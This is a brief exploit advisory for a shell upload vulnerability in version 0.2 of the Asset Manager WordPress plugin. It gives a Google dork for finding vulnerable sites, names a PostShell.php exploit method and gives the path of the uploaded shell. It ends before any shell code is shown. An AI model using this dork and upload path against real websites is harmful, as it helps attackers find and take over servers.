Key Information Vulnerability Name: WordPress Plugins Asset Manager Shell Upload Vulnerability Version: 0.2 Links: - Plugin Page: http://wordpress.org/extend/plugins/asset-manager/ - Download Link: http://downloads.wordpress.org/plugin/asset-manager0.2.zip Date: May 26, 2012 Google Dork: inurl:/wp-content/plugins/asset-manager/ Exploit Method PostShell.php: Shell Access: - URL: http://www.exemple.com/wordpress/wp-content/uploads/assets/temp/lo.php - Content of lo.php: